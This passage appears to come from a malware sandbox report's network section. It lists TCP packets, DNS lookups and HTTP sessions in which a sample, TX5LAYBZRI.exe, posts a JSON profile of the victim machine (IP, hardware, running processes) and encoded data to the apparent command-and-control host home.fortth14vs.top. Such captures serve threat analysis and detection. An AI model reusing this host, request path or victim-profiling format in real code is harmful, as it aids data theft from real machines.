                                          Dec 31, 2024 15:47:04.793582916 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.793668032 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.793677092 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.793684959 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.793704033 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.793713093 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.793721914 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.793773890 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.793783903 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.793833017 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.793842077 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.793911934 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.793920994 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.793953896 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.793963909 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.793987036 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.793996096 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.794037104 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.794045925 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.794063091 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.794070959 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.794083118 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.794117928 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.794126987 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.794135094 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.794176102 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.794184923 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.794202089 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.794212103 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.794222116 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798057079 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798067093 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798151970 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798161983 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798171997 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798222065 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798232079 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798240900 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798250914 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798285007 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798295975 CET4970680192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:04.798341990 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798352003 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798383951 CET4970680192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:04.798408031 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798418045 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798445940 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798455000 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798505068 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798513889 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798547983 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798557043 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798593998 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798604012 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798640013 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798649073 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798676968 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798686028 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798721075 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798729897 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798770905 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798796892 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798806906 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798815966 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798867941 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798877954 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798958063 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.798968077 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.799019098 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.799027920 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.799050093 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.799058914 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.799088955 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.799098969 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.799134970 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.799144983 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.799163103 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.799171925 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.799259901 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.799269915 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.799278021 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.799288034 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.799360037 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.799370050 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.799379110 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.803244114 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.803288937 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.803353071 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.803412914 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.803489923 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.803500891 CET4970680192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:04.803539038 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.803627968 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.803637028 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.803713083 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.803766966 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.803824902 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.803836107 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.803927898 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.803937912 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.803989887 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.803998947 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804059982 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804069996 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804107904 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804117918 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804250956 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804260969 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804269075 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804280043 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804358959 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804368019 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804440022 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804450035 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804496050 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804506063 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804584980 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804594040 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804639101 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804649115 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804687977 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804697990 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804709911 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804769039 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804778099 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804786921 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804805994 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804814100 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804866076 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804874897 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804894924 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804903984 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804913998 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804922104 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804965019 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.804975033 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.805025101 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.805033922 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.805042982 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.808337927 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.808347940 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.808389902 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.808398962 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.808470964 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.808480978 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.808532000 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.808664083 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.808737040 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.808747053 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.808777094 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.808785915 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.808839083 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.808847904 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.808890104 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.808898926 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.808917999 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.808927059 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.808971882 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.808983088 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.809016943 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.809025049 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.809051991 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.809061050 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.809077978 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.809087038 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.809132099 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.809142113 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.809159994 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.809169054 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.809179068 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.809272051 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.809281111 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.809290886 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.809298992 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.851464987 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:06.748404980 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:06.748872995 CET4970680192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:06.753901958 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:06.753957987 CET4970680192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:07.097337008 CET4970780192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:07.102197886 CET804970734.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:07.102277994 CET4970780192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:07.105252028 CET4970780192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:07.110068083 CET804970734.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:07.711004019 CET804970734.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:07.711416960 CET4970780192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:07.716527939 CET804970734.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:07.716634035 CET4970780192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:08.034471989 CET4970880192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:08.039937019 CET804970834.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:08.040009975 CET4970880192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:08.040447950 CET4970880192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:08.046150923 CET804970834.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:08.759886980 CET804970834.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:08.760308027 CET4970880192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:08.765455961 CET804970834.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:08.765511990 CET4970880192.168.2.534.147.147.173

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Dec 31, 2024 15:47:01.249290943 CET6285153192.168.2.51.1.1.1
                                          Dec 31, 2024 15:47:01.249356985 CET6285153192.168.2.51.1.1.1
                                          Dec 31, 2024 15:47:01.256088972 CET53628511.1.1.1192.168.2.5
                                          Dec 31, 2024 15:47:01.256239891 CET53628511.1.1.1192.168.2.5
                                          Dec 31, 2024 15:47:03.614389896 CET6285453192.168.2.51.1.1.1
                                          Dec 31, 2024 15:47:03.614460945 CET6285453192.168.2.51.1.1.1
                                          Dec 31, 2024 15:47:03.621062040 CET53628541.1.1.1192.168.2.5
                                          Dec 31, 2024 15:47:03.821193933 CET53628541.1.1.1192.168.2.5
                                          Dec 31, 2024 15:47:06.852998018 CET6285653192.168.2.51.1.1.1
                                          Dec 31, 2024 15:47:06.853043079 CET6285653192.168.2.51.1.1.1
                                          Dec 31, 2024 15:47:07.071731091 CET53628561.1.1.1192.168.2.5
                                          Dec 31, 2024 15:47:07.085095882 CET53628561.1.1.1192.168.2.5
                                          Dec 31, 2024 15:47:07.760904074 CET6285853192.168.2.51.1.1.1
                                          Dec 31, 2024 15:47:07.760943890 CET6285853192.168.2.51.1.1.1
                                          Dec 31, 2024 15:47:07.854871035 CET53628581.1.1.1192.168.2.5
                                          Dec 31, 2024 15:47:08.033726931 CET53628581.1.1.1192.168.2.5

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Dec 31, 2024 15:47:01.249290943 CET192.168.2.51.1.1.10xca9bStandard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                          Dec 31, 2024 15:47:01.249356985 CET192.168.2.51.1.1.10x213aStandard query (0)httpbin.org28IN (0x0001)false
                                          Dec 31, 2024 15:47:03.614389896 CET192.168.2.51.1.1.10xc753Standard query (0)home.fortth14vs.topA (IP address)IN (0x0001)false
                                          Dec 31, 2024 15:47:03.614460945 CET192.168.2.51.1.1.10xb676Standard query (0)home.fortth14vs.top28IN (0x0001)false
                                          Dec 31, 2024 15:47:03.627711058 CET192.168.2.51.1.1.10xb676Standard query (0)home.fortth14vs.top28IN (0x0001)false
                                          Dec 31, 2024 15:47:06.852998018 CET192.168.2.51.1.1.10x93aeStandard query (0)home.fortth14vs.topA (IP address)IN (0x0001)false
                                          Dec 31, 2024 15:47:06.853043079 CET192.168.2.51.1.1.10xf89bStandard query (0)home.fortth14vs.top28IN (0x0001)false
                                          Dec 31, 2024 15:47:07.760904074 CET192.168.2.51.1.1.10xf2aStandard query (0)home.fortth14vs.topA (IP address)IN (0x0001)false
                                          Dec 31, 2024 15:47:07.760943890 CET192.168.2.51.1.1.10xa6b5Standard query (0)home.fortth14vs.top28IN (0x0001)false

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Dec 31, 2024 15:47:01.256239891 CET1.1.1.1192.168.2.50xca9bNo error (0)httpbin.org34.200.57.114A (IP address)IN (0x0001)false
                                          Dec 31, 2024 15:47:01.256239891 CET1.1.1.1192.168.2.50xca9bNo error (0)httpbin.org34.197.122.172A (IP address)IN (0x0001)false
                                          Dec 31, 2024 15:47:03.821193933 CET1.1.1.1192.168.2.50xc753No error (0)home.fortth14vs.top34.147.147.173A (IP address)IN (0x0001)false
                                          Dec 31, 2024 15:47:07.071731091 CET1.1.1.1192.168.2.50x93aeNo error (0)home.fortth14vs.top34.147.147.173A (IP address)IN (0x0001)false
                                          Dec 31, 2024 15:47:07.854871035 CET1.1.1.1192.168.2.50xf2aNo error (0)home.fortth14vs.top34.147.147.173A (IP address)IN (0x0001)false

                                          HTTP Request Dependency Graph

                                          • httpbin.org
                                          • home.fortth14vs.top

                                          HTTP Packets

                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.54970634.147.147.173807088C:\Users\user\Desktop\TX5LAYBZRI.exe
                                          TimestampBytes transferredDirectionData
                                          Dec 31, 2024 15:47:04.337905884 CET12360OUTPOST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1
                                          Host: home.fortth14vs.top
                                          Accept: */*
                                          Content-Type: application/json
                                          Content-Length: 502080
                                          Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 32 38 34 38 38 32 34 31 39 35 37 38 33 31 36 35 33 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED]
                                          Data Ascii: { "ip": "8.46.123.189", "current_time": "8428488241957831653", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 332 }, { "name": "csrss.exe", "pid": 420 }, { "name": "wininit.exe", "pid": 496 }, { "name": "csrss.exe", "pid": 504 }, { "name": "winlogon.exe", "pid": 564 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "fontdrvhost.exe", "pid": 788 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 992 }, { "name": "svchost.exe", "pid": 444 }, { "name": "svchost.exe", "pid": 732 }, { "name": "svchost.exe", "pid": 280 }, { "name": "svchost.exe" [TRUNCATED]
                                          Dec 31, 2024 15:47:04.342936993 CET9888OUTData Raw: 62 2b 4b 5c 2f 30 61 5c 2f 47 33 77 50 79 7a 4b 73 34 38 55 75 42 73 52 77 70 6c 75 64 34 36 70 6c 75 56 34 71 72 6e 58 44 57 61 78 78 57 4e 70 59 65 57 4b 71 55 46 44 49 73 35 7a 53 72 53 61 77 38 5a 56 46 4f 76 54 70 55 35 4a 4e 52 6e 4b 57 68
                                          Data Ascii: b+K\/0a\/G3wPyzKs48UuBsRwplud46pluV4qrnXDWaxxWNpYeWKqUFDIs5zSrSaw8ZVFOvTpU5JNRnKWh5\/RT2XHI6fyplf0CfhgUUUUGlPr8v1IXj5D+\/+f1\/z6NqxX7B\/wDBMb9iX4Ifta+D\/itqfxYi8WC+8E+I\/DdhpE\/hfxCujGS01vTdSuLiK+jnsNShm8mbTEa2eKK3kX7RcLO86+QsH5\/4meJGR+FXC1bi
                                          Dec 31, 2024 15:47:04.342978001 CET4944OUTData Raw: 2f 34 76 38 4f 65 45 4c 47 7a 38 52 61 33 72 66 78 36 2b 49 64 6c 4b 76 68 38 61 34 62 33 54 37 73 65 48 5a 4e 53 61 43 33 5c 2f 41 4c 49 61 39 53 78 61 33 2b 78 5c 2f 7a 62 56 5c 2f 54 37 2b 30 62 38 56 74 4d 2b 4d 48 5c 2f 42 4c 76 39 70 62 78
                                          Data Ascii: /4v8OeELGz8Ra3rfx6+IdlKvh8a4b3T7seHZNSaC3\/ALIa9Sxa3+x\/zbV\/T7+0b8VtM+MH\/BLv9pbxLpP7QX\/DSVvY+OfA2hP45\/4VRcfB7+yprb4hfBXUG8Kf8Izc6dpj332GPU49Y\/t0QOlz\/bv9niZjpjJH\/MN5fv8Ap\/8AXr\/V\/wCgfmOLxfAvGGFqYrEVcFg+IsJPA4WrXdajg\/rmA9piVhoqpVpUo16s
                                          Dec 31, 2024 15:47:04.343005896 CET4944OUTData Raw: 44 6a 2b 78 74 46 30 6a 77 5c 2f 5a 36 59 4a 6b 31 57 39 31 66 77 37 46 59 36 52 59 32 63 46 77 31 6a 61 33 47 69 33 64 7a 4f 77 7a 42 63 33 7a 71 72 53 70 63 4b 74 76 74 56 2b 6d 50 69 58 52 39 4b 54 77 33 72 63 63 57 6e 32 6c 75 72 57 56 37 4b
                                          Data Ascii: Dj+xtF0jw\/Z6YJk1W91fw7FY6RY2cFw1ja3Gi3dzOwzBc3zqrSpcKtvtV+mPiXR9KTw3rccWn2lurWV7Kfs0EdsTLIjNJITAsZZ5GJZ2bJdiS2Sa\/PyfQUwWt5ymMnbMMr\/38UAqB7oxx1Pr\/J2e+J2QcV53jM0oZOuF6GJnT9nl9J\/WcNR5KFGjKbxFKEJTrYidOWJxVWWGoxnXrVKjV5SZ\/buS+EXFHCWQYDK6+c0+L
                                          Dec 31, 2024 15:47:04.346297979 CET4944OUTData Raw: 5c 2f 7a 38 5c 2f 35 5c 2f 77 44 72 55 48 52 54 36 5c 2f 4c 39 53 48 7a 4f 76 38 66 36 5a 39 71 59 71 78 73 79 53 50 38 41 35 5c 2f 30 62 5c 2f 77 43 74 55 32 33 2b 42 38 66 7a 34 5c 2f 38 41 72 5a 5c 2f 4c 38 61 68 5c 2f 32 5c 2f 38 41 6c 6e 5c
                                          Data Ascii: \/z8\/5\/wDrUHRT6\/L9SHzOv8f6Z9qYqxsySP8A5\/0b\/wCtU23+B8fz4\/8ArZ\/L8ah\/2\/8Aln\/9f8+nH1460HYQ\/eX5\/TpHz\/n2\/HioW\/ubfpn+f+T9e9XJE+VPk\/795\/p6fX\/68MYT53\/j\/wCWv+f8\/rQVS6f4f8iHy\/8ApjUUn58eb\/retSyH\/Y2f9dJf16f5x0pn9xNsfPXt5P0oO4hk2fI\/
                                          Dec 31, 2024 15:47:04.347780943 CET4944OUTData Raw: 62 66 45 44 77 46 6f 47 70 61 6e 66 7a 61 62 70 48 67 5c 2f 34 76 38 41 67 76 55 66 44 58 78 58 38 48 76 70 6d 6c 58 63 65 6e 32 38 58 68 33 78 76 62 61 58 62 65 52 47 73 64 6a 4c 62 78 4c 45 66 69 44 77 7a 72 6b 48 69 58 54 66 42 75 75 32 75 70
                                          Data Ascii: bfEDwFoGpanfzabpHg\/4v8AgvUfDXxX8HvpmlXcen28Xh3xvbaXbeRGsdjLbxLEfiDwzrkHiXTfBuu2upeF7Xw14o8KfGPxTq\/im81TXf7A+Gv\/AAoSaSP4n+HviVPbeFLm80XxRokd54PuLTStFsfEf9uj4kfD200Oe\/1XxLBp8XR3t58PLb4IfEz472f7Q\/7P2q+HfhJ4R8JeKPGmgRH9pbR\/EVrqHjzUE0bwZ4B0++
                                          Dec 31, 2024 15:47:04.347814083 CET2472OUTData Raw: 4b 44 62 77 51 50 47 77 38 4e 5a 38 54 5c 2f 38 41 43 30 42 34 6d 4f 6d 5c 2f 38 49 35 34 76 30 44 78 61 69 6a 52 66 2b 46 65 65 48 76 74 58 32 32 54 51 55 30 39 6e 5c 2f 74 61 33 2b 79 70 64 4e 64 68 4c 6c 6f 42 62 54 66 6a 62 56 67 57 58 32 66
                                          Data Ascii: KDbwQPGw8NZ8T\/8AC0B4mOm\/8I54v0DxaijRf+FeeHvtX22TQU09n\/ta3+ypdNdhLloBbTfjbVgWX2fxBf6Xr\/ij4eeEPDXh\/wCEXwd+Nfjb4neKPEeu2nw98BeEfj14U03xb8LtL8QT6d4O1XxhrPjrxPa6nHp+m+Avh34N8d+KNUvLLW73Q9O1fw54d1\/XdMxm1fQ5vEN9o3h7xd4O+IGlW9jaajYeNPAV54mn8Naxb
                                          Dec 31, 2024 15:47:04.347836971 CET4944OUTData Raw: 64 71 73 79 65 64 74 38 6d 62 43 66 76 51 66 33 66 37 69 2b 5c 2f 77 43 76 72 30 78 2b 48 59 55 7a 2b 38 45 39 5c 2f 73 73 6e 39 4d 66 35 37 55 47 68 44 39 32 52 50 6b 32 66 2b 31 52 5c 2f 6e 5c 2f 4a 7a 54 4a 49 33 32 6f 72 5c 2f 41 47 66 36 2b
